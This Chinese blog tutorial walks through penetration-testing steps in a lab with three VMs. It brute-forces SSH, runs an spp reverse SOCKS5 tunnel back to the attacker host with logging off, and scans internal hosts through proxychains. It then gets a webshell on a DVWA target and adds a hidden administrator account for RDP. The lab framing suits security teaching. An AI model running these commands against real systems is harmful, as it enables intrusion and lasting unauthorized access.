赞
踩
试验拓扑:(说明:这个环境只是博主能够想到的一个比较简单的内网的环境,各位大哥也可以使用别的内网环境,这个试验的目的是学会spp如何做内网穿透,环境不重要的!!!!)
这里补充一点,内网的机器使用机主机模式,但是这里不去勾选,这样的话内网的主机就完全与宿主机隔离
一台kali 一台centos 一台win7
ip配置:
kali:192.168.12.20
centos:192.168.12.30 10.10.20.13
win7:10.10.20.12 10.10.30.1
条件是:
kali能与centos的12.30这个网卡互通
centos的20.13网卡与win7的20.12网卡通
kali作为外网,centos作为内外网隔离的机器,win7完全是隔离外网,作为内网
这里我们直接使用centos作为跳板机,得到win7的服务,然后得到3389远程桌面,之后登陆,拿下内网的win7机器!
使用kali进行主机发现
这里发现有个30,使用nmap进行扫描
这里只有22端口,利用22端口进行漏洞利用,我们可以使用hydra或者msf
这里我们得到了账号密码,我们登陆(密码是空格,所以这里没有显示,正常情况下有密码,用字典是可以爆破出来的)
这里我们发现有个10.10.20.13的网络,我们可以进行内网的探测
但是这里我们需要去加入一个socks通道,所以我们使用spp这个工具或者使用frp,这里还可以使用msf。
通过scp命令讲这个工具传入到目标主机中
./spp -type server -proto tcp -listen :8888 --nolog 1 -noprint 1 & 在服务器端建立连接
./spp.exe -name "fxdlsocks" -type reverse_socks5_client -server 192.168.12.20:8888 -fromaddr 192.168.12.20:1080 -proxyproto tcp -proto tcp -noprint 1 -nolog 1 & 在目标主机这边使用这个,将其连接到服务器,并且在服务器的1080端口开放socks代理 --nolog是 1 是不打印日志 --noprint 1 不在终端中输出任何内容(这里可以在客户端使用,服务器端建议不要使用,可以观看流量用)
服务器端这里就开放了1080端口,我们这个时候就可以使用socks代理了
vim /etc/proxychains4.conf 在这个配置文件的末尾写入socks代理的ip地址以及端口(这里建立了socks代理以后,使用proxycvhains来进行配置,这个是kali自带的工具,windows中可以使用proxifier和sockscap64这些代理工具)
git clone https://github.com/zer0h/httpscan#httpscan s使用这个工具对c段就行扫描(一个c段扫描的工具,还有很多,各位大哥,可以自己去找找看)
proxychains python cscan1.py -i 10.10.20.0/24 对c段进行扫描(使用代理扫描,否则扫描不到)
经过我们进行信息收集发现,这里有一个10.10.20.11的地址
并且是有一个80端口的站点
那我们就使用代理去探测这个站点有什么目录
proxychains dirb http://10.10.20.11 /root/mulu.txt 使用这个文件去探测
有dvwa目录,我们可以去查看dvwa(这里只是展示spp工具的使用,所以这里直接使用了dvwa靶场,各位可以尝试使用其他的cms或者靶场)
这里使用代理打开浏览器
(这里爆破用户名密码,就不做展示了,跟web渗透一样,bp就可以直接拿下!)
我们传入一个一句话
这里我们找到路径了,我们直接使用websehll工具连接,这里我使用哥斯拉(这里同理直接使用代理打开,也可以打开以后配置代理,这里还可以使用Antsword)
这里成功getshell
这里成功的拿下,发现是20.11他还有一个30网段的ip
这里我们使用端口扫描发现他开放有3389(各位这里也可以使用代理然后利用端口扫描的工具进行扫描也可以)
这里我们就可以创建一个用户,然后3389远程登陆(也可以使用ew或者lcx做一个内网端口转发)
使用net user a 123 /add 创建一个a用户密码是123
使用net localgroup administrators a /add 将a用户添加到管理员组中
使用
net user 查看到a用户
net localgroup administrators 可以看到管理员组中的用户有什么,这里我们看到有a
使用a进行3389远程登陆拿下服务器
proxychains rdesktop 10.10.20.11 -u a -p 123
成功拿下我们可以去看用户权限
使用a用户登陆成功(这个只是博主可以想到的一种方式,各位大哥有好的思路的话可以试试)
希望对各位有所帮助!内网的一些相关的在持续更新中!
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。